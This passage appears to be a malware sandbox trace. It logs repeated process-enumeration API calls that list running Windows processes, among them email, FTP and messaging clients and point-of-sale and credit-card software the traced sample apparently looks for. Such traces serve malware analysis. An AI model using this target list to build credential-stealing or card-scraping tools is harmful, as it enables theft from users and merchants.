hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0286.336] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0286.342] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0286.344] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0286.346] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0286.348] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0286.350] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0286.352] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0286.399] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0286.455] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0286.457] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0286.459] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0286.461] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0286.462] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0286.467] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0286.469] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0286.471] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0286.473] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0286.474] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0286.476] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0286.478] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0286.482] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0286.484] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0286.486] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0286.487] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0286.489] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0286.491] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0286.492] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0286.494] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0286.514] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0286.516] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0286.518] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0286.520] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0286.522] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0286.524] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0286.526] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0286.530] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0286.532] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0286.533] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.535] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0286.537] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0286.539] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0286.540] CloseHandle (hObject=0x224c) returned 1 [0286.541] Sleep (dwMilliseconds=0x64) [0286.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0286.696] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.701] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0286.703] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0286.704] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.706] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0286.709] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.711] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0286.712] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0286.716] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0286.718] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.719] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.721] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0286.723] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.724] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.726] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.728] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.778] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.780] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.782] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.783] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0286.785] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0286.786] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0286.788] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.789] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0286.791] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0286.795] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0286.796] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0286.798] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0286.799] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.801] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0286.803] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0286.804] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.806] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0286.807] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0286.812] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0286.813] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0286.815] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0286.817] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0286.818] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0286.820] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0286.821] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0286.967] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 